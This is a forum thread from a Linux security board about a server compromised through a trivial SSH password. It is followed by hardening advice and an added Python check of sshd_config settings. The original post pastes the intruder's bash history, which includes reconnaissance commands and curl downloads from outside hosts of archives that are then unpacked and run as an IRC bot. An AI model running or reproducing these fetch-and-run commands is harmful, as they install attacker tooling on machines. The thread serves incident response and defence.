Linux - Security: This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

06-19-2006, 08:22 AM
#1
Member
Registered: Jan 2005
Posts: 40
machine break in
Ok, I found out one of my boxes was hacked over the weekend; found this in the bash history - any ideas? The file they downloaded and ran is some kind of IRC bouncer.
w
/sbin/ifconfig |grep inet
cat /etc/hosts
passwd
cd ..
cd ..
cd ..
cd /var/tmp
cd ..
cd ..
cd tmp
tar xzvf psydrawin.tar.gz
cd psybnc
chmod +x *
make
./psybnc
cd ..
curl -O www.channel.as.ro/psyd.tar.gz
tar xzvf psyd.tar.gz
cd psybnc
./psybnc
cd ..
curl -O atac.uv.ro/DFL
tar xzvf DFL
cd .virtual
chmod +x *
./darwin

06-19-2006, 09:04 AM
#2
Member
Registered: Jul 2005
Location: England, UK
Distribution: Ubuntu 8.04 Server, Kubuntu 12.04
Posts: 698
Looks like it's definitely some kind of IRC bot.

06-19-2006, 09:05 AM
#3
Member
Registered: Mar 2004
Posts: 135
Do you know how he got in?

06-19-2006, 09:22 AM
#4
Member
Registered: Jan 2005
Posts: 40
Original Poster
Yep, ssh - I only started here last week and only found out this server, let's just say, 3 letter username (very common protocol) with matching password!!! - totally stupid password and username there

06-21-2006, 03:18 AM
#5
Member
Registered: Apr 2006
Location: Finland
Distribution: Ubuntu, Gentoo, Debian
Posts: 88
You should unplug your network cable. Then they surely can't come back in.
And then run chkrootkit and rkhunter to check for possible rootkits. And change passwords.
Last edited by Fadoksi; 06-21-2006 at 03:21 AM.

06-21-2006, 11:30 AM
#6
Member
Registered: Jan 2005
Posts: 40
Original Poster
Ah, I just shut down the machine as soon as I found out, just culled the OS and did a re-install with better passwords

06-21-2006, 11:45 AM
#7
Member
Registered: Apr 2006
Location: Finland
Distribution: Ubuntu, Gentoo, Debian
Posts: 88
All right then. I hope you have better luck this time

06-21-2006, 12:20 PM
#8
Moderator
Registered: May 2001
Posts: 29,415
"re-install with better passwords"
Is better passes really *all* you did?

06-21-2006, 11:48 PM
#9
Member
Registered: Mar 2004
Posts: 135
It is better than nothing.

06-22-2006, 02:20 AM
#10
Senior Member
Registered: Dec 2005
Location: Finland
Distribution: Slackware, CentOS, RHEL, OpenBSD
Posts: 1,006
Have you checked the sshd_config file? At least make it more secure and delete all unnecessary services from running.

06-22-2006, 07:18 AM
#11
Member
Registered: May 2004
Location: Underground base in the mountains
Distribution: FreeBSD, Fedora, Ubuntu
Posts: 87
Instead of using password authentication for your ssh use the private key authentication. It's more secure this way. If you are going to use a password remember to change your password frequently. You don't want another hacker to break into your computer.

06-22-2006, 07:36 AM
#12
Member
Registered: Aug 2005
Location: Midland, TX
Distribution: Ubuntu
Posts: 125
I always set SSH to use only keys, to a fixed set of users, and I put it on a different port. NOT 22.
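
Added example (not part of the original thread): a small Python check for the three sshd_config settings post #12 describes, namely key-only logins, a fixed set of users, and a port other than 22. The sample configs, the user names and port 2222 are constructed for illustration; the parser reads only the global section of the file.

```python
import re

# Constructed sample configs (not taken from the compromised machine).
WEAK = "Port 22\nPasswordAuthentication yes\n"
HARDENED = ("Port 2222\nPasswordAuthentication no\n"
            "PubkeyAuthentication yes\nAllowUsers alice bob\n")
# A later "no" does not override an earlier "yes": sshd uses the first value.
SHADOWED = ("Port 2222\nAllowUsers alice\n"
            "PasswordAuthentication yes\nPasswordAuthentication no\n")


def parse_global(text):
    """Map lowercased keyword -> list of values, in file order.

    Only the global section is read: parsing stops at the first Match
    block, and Include files are not followed (simplification).
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break
        settings.setdefault(key, []).append(parts[1] if len(parts) > 1 else "")
    return settings


def audit(text):
    """Return (keyword, problem) pairs for the three settings from the thread."""
    cfg = parse_global(text)
    findings = []
    # Single-valued keyword: first occurrence wins; absent means default "yes".
    if cfg.get("passwordauthentication", ["yes"])[0].lower() != "no":
        findings.append(("PasswordAuthentication", "password logins still accepted"))
    if not any(v.strip() for v in cfg.get("allowusers", [])):
        findings.append(("AllowUsers", "logins not limited to a fixed set of users"))
    # Port may be given several times; absent means the default, 22.
    if "22" in cfg.get("port", ["22"]):
        findings.append(("Port", "sshd listens on the default port 22"))
    return findings


if __name__ == "__main__":
    for name, sample in (("weak", WEAK), ("hardened", HARDENED), ("shadowed", SHADOWED)):
        print(name, audit(sample) or "ok")
```

On a live host, `sshd -T` prints the effective configuration, including values that come from Match blocks and included files, which this sketch does not read.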
All times are GMT -5. The time now is 04:43 PM.